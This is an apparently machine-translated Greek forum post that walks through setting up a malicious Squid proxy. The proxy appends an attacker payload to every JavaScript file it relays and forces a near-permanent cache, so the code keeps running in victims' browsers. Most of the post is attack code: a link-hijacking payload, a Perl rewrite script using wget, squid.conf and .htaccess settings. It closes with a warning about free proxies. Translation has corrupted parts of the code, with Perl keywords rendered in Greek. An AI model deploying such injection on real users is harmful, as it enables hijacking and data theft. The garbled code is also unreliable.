Αυτό το άρθρο επεξεργάστηκε τελευταία φορά από τον Mo Xiaowen στις 2015-6-7 23:19
Αυτό μπορεί να γίνει απλά τροποποιώντας τη διαμόρφωση του SQUID
Τι είναι το SQUID;
Το Squid είναι ένα λογισμικό που αποθηκεύει προσωρινά δεδομένα Διαδικτύου, λαμβάνει αιτήματα λήψης από χρήστες και επεξεργάζεται αυτόματα τα ληφθέντα δεδομένα. Όταν ένας χρήστης θέλει να κατεβάσει μια αρχική σελίδα, μπορεί να στείλει ένα αίτημα στο Squid, να ζητήσει από το Squid να το κατεβάσει για λογαριασμό του, στη συνέχεια το Squid συνδέεται στον ιστότοπο και ζητά την αρχική σελίδα και, στη συνέχεια, στέλνει την αρχική σελίδα στον χρήστη διατηρώντας ένα αντίγραφο ασφαλείας, όταν άλλοι χρήστες κάνουν αίτηση για την ίδια σελίδα, το Squid στέλνει αμέσως το αποθηκευμένο αντίγραφο ασφαλείας στον χρήστη, έτσι ώστε ο χρήστης να αισθάνεται ότι η ταχύτητα είναι αρκετά γρήγορη. Το Squid μπορεί να μεσολαβήσει πρωτόκολλα όπως HTTP, FTP, GOPHER, SSL και WAIS, και το Squid μπορεί να το χειριστεί αυτόματα και μπορείτε να ρυθμίσετε το Squid σύμφωνα με τις ανάγκες σας για να φιλτράρετε ανεπιθύμητα πράγματα.
Το Squid μπορεί να λειτουργήσει σε πολλά λειτουργικά συστήματα, όπως AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 κ.λπ.
Η υλοποίηση είναι πολύ απλή:
1. Εγκαταστήστε το Squid σε έναν διακομιστή Linux.
2. Τροποποιήστε τον κώδικα του διακομιστή, εισαγάγετε ένα κομμάτι του κώδικά μας σε όλα τα μεταδιδόμενα javascrip και στείλτε το.
3. Ρυθμίστε τον χρόνο προσωρινής μνήμης του τροποποιημένου αρχείου js όσο το δυνατόν υψηλότερο.
Αυτή η μέθοδος ισχύει επίσης για ιστότοπους με ενεργοποιημένο το SSL, εάν ο ιστότοπος φορτώνει έναν μη ασφαλή πόρο (όπως το jquery για έναν ιστότοπο HTTP), τα περισσότερα προγράμματα περιήγησης θα δώσουν μια προειδοποίηση, αλλά λίγοι άνθρωποι δίνουν προσοχή.
Ο Chema είπε ότι περισσότεροι από 5,000 άνθρωποι χρησιμοποίησαν τον διακομιστή μεσολάβησης λίγες μέρες αφότου τον κυκλοφόρησε και οι περισσότεροι τον χρησιμοποίησαν για να κάνουν άσχημα πράγματα, επειδή χρησιμοποίησαν τον διακομιστή μεσολάβησης, οπότε νόμιζαν ότι ήταν ανώνυμος και ασφαλής, αλλά ποτέ δεν περίμεναν ότι ο διακομιστής μεσολάβησης θα έκανε επίσης άσχημα πράγματα.
Κάντε τον κακόβουλο διακομιστή μεσολάβησης σας
Εάν έχετε ήδη διακομιστή μεσολάβησης Squid, θα χρειαστείτε επίσης έναν διακομιστή ιστού όπως ο Apache.
Βήμα 1: Δημιουργήστε ένα ωφέλιμο φορτίο
Χρησιμοποιώ ένα απλό σενάριο ως επίδειξη για να κατευθύνω όλους τους υπερσυνδέσμους στον ιστότοπό μου.
/etc/squid/payload.js
[mw_shl_code=javascrip αφαιρέστε t, true]for(var i=0; i<document.getelementsbytagname('a').μήκος; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Βήμα 2 Γράψτε ένα σενάριο για να μολύνετε όλα τα αρχεία JS
/etc/squid/poison.pl
[mw_shl_code=perl,true]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
ενώ(<>)
{
Τσιμπήστε $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
σύστημα("chmod o+r /var/www/tmp/$pid-$count.js");
σύστημα ("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
εκτύπωση "http://127.0.0.1:80/tmp/$pid-$count.js";
}
αλλιώς
{
εκτύπωση "$_";
}
$count++;
}[/mw_shl_code]
Αυτό το σενάριο χρησιμοποιεί το wget για να πάρει το αρχικό javascrip της σελίδας και να αφαιρέσει το αρχείο t, στη συνέχεια να προσθέσει τον κώδικα στο /etc/squid/payload.js και να στείλει το τροποποιημένο αρχείο στον πελάτη, ενώ πρέπει να δημιουργήσετε τον κατάλογο /var/www/tmp και να επιτρέψετε στο squid να γράφει αρχεία σε αυτόν. Αυτός ο κατάλογος αποθηκεύει τα τροποποιημένα αρχεία js.
Βήμα 3 Συνδυάστε το παραπάνω σενάριο με το Squid
Προσθέστε το στο /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Βήμα 4 Κάντε την προσωρινή μνήμη να μην αποτύχει ποτέ
/var/www/tmp/.htaccess
[mw_shl_code=html,αληθές] ΛήγειΕνεργό στις
ExpiresDefault "πρόσβαση συν 3000 ημέρες"[/mw_shl_code]
Αυτό θα πει στον Apache να του δώσει μεγάλο χρόνο λήξης μέχρι ο χρήστης να καθαρίσει την προσωρινή μνήμη του.
Εάν συνδέσετε αυτόν τον διακομιστή μεσολάβησης, κάνοντας κλικ σε οποιονδήποτε υπερσύνδεσμο θα σας ανακατευθύνει στον ιστότοπό μου και η προσωρινή μνήμη θα εξακολουθεί να υπάρχει ακόμα κι αν δεν χρησιμοποιήσετε τον διακομιστή μεσολάβησης αργότερα. Απλώς χρησιμοποίησα ένα μη επιθετικό ωφέλιμο φορτίο και με αυτήν τη μέθοδο, οι χάκερ μπορούν να κάνουν πολλά περισσότερα. Επομένως, υπενθυμίστε στον εαυτό σας και στους φίλους σας να είστε προσεκτικοί σχετικά με τη χρήση δωρεάν διακομιστή μεσολάβησης.
|
Δημοσιεύτηκε στις 19/1/2015 2:34:56 π.μ.
|
|
|
|
Δημοσιεύτηκε στις 19/1/2015 8:48:45 π.μ.
|
Σπιτονοικοκύρης|
Δημοσιεύτηκε στις 20/1/2015 2:36:06 μ.μ.
|
